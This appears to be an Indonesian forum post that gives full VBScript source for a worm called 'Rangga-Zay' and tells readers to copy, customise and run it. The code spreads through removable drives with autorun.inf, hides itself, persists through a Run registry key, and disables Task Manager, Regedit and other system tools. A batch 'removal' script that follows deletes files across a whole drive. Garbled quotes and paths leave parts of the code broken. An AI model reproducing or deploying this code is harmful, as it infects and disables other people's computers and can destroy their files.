[center]
SEKEDAR ilmu, Berikut adalah contoh coding dari virus Rangga-Zay!!!
Copy-Paste coding berikut lalu ubah baris yang dicetak tebal atau cetak miring:
‘//–Awal dari coding, Memaksa Windows Untuk Mengabaikan Pesan Error Lalu Lanjut Mengeksekusi Baris Perintah Selanjutnya–//
on error resume next
’//–Dim Kata Kunci Berikut–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,namavirus,nt,check,sd
‘//–Membuat Sebuah File Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe namavirus.ext”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘//–Membuat Sebuah File Induk Virus Pada Folder Windows (contoh: C:WINDOWS)-//
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “batch- namavirus.ext “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “batch- namavirus.ext”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “batch- namavirus.ext “)
tf.attributes = 39
‘//–Membuat File Autorun Yang Akan Dieksekusi Secara Otomatis–//
‘Menggandakan diri apabila tipe drive adalah 1 dan 2 (removable) termasuk disket
for each flashdrive in fs.drives
‘//–Melakukan Pemeriksaan Tipe Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
‘//–Perintah Untuk Menyebarkan File Virus Ke Drive Lain Dengan Tipe Drive 1, 2, Atau Dengan Path A:–//
set tf=fs.getfile(flashdrive.path &”namavirus.ext “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”namavirus.ext “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”namavirus.ext “)
tf.attributes = 39
‘//–Memanggil File Autorun Setup Information Untuk Di Masukkan Ke Dalam File Autorun–//
set tf =fs.getfile(flashdrive.path &”autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi Registry–//
set namavirus = createobject(”WScript.Shell”)
‘//–Menambahkan Pesan Pada Title Bar Internet Explorer–//
namavirus.regwrite “HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title”,” Masukkan pesan anda disini “
‘//–Membuat File Dengan Attribut Hidden Tidak Ditampilkan Melalui Windows Explorer–//
namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerAdvancedHidden”, “0?, “REG_DWORD”
‘//–Menghilangkan Menu Find, Folder Options, Run, dan Mematikan Regedit serta Task Manager–//
namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools”, “1?, “REG_DWORD”
namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr”, “1?, “REG_DWORD”
‘//–Mematikan Fungsi Klik Kanan–//
namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu”, “1?, “REG_DWORD”
‘//–Memunculkan Pesan Setiap Windows Startup–//
namavirus.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption”, “Masukkan pesan anda disini.”
‘//–Membuat Windows Untuk Selalu Mengeksekusi Virus Pada Saat Startup–//
namavirus.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunSystemdir”, windowpath & “batch- namavirus.ext “
‘//–Mengubah Registered Owner Dan Organization–//
namavirus.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOrganization”, “Masukkan Teks Disini”
namavirus.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOwner”,”Masukkan Teks Disini”
‘//–Melakukan Perulangan Fungsi Sleep–//
if check 1 then
Wscript.sleep 200000
end if
loop while check 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari coding
Simpan dengan nama file bebas tapi ekstensinya harus ".VBS"; agar bisa terbaca dan tereksekusi oleh Windows Scripting Host. Caranya FileSave As.... lalu pada bagian "Save as type" pilih “All Files (*.*)" dan masukkan ekstensi file (.vbs)
Klik [Save]
Sekarang, kita akan membuat penghapusan virus tersebut:
Buka aplikasi text editor (Notepad, Wordpad, dll..)
Copy-Paste coding berikut pada text editor anda
echo Anda yakin mau mengeksekusi penghapusan?
PAUSE
del /s /f C:*.vbs
echo Penghapusan tahap pertama selesai, penghapusan tahap kedua akan dimulai...
PAUSE
del /f /q C:*.vbs
echo Penghapusan selesai. Silahkan restart komputer anda.
PAUSE
EXIT
Simpan file tersebut dengan nama file bebas tapi ekstensinya harus ".bat"
Jalankan file tersebut dan tunggu hingga selesai
Restart komputer
O iya, path "C:" bisa diganti dengan path menuju drive apa saja (A-Z) serta ekstensi file bisa diganti sesuai dengan ekstensi virus. Hati-hati ketika mengubah ekstensi penghapusan menjadi ".exe" karena semua file aplikasi pada drive tersebut akan terhapus tanpa kecuali!
coba ajah GAN..
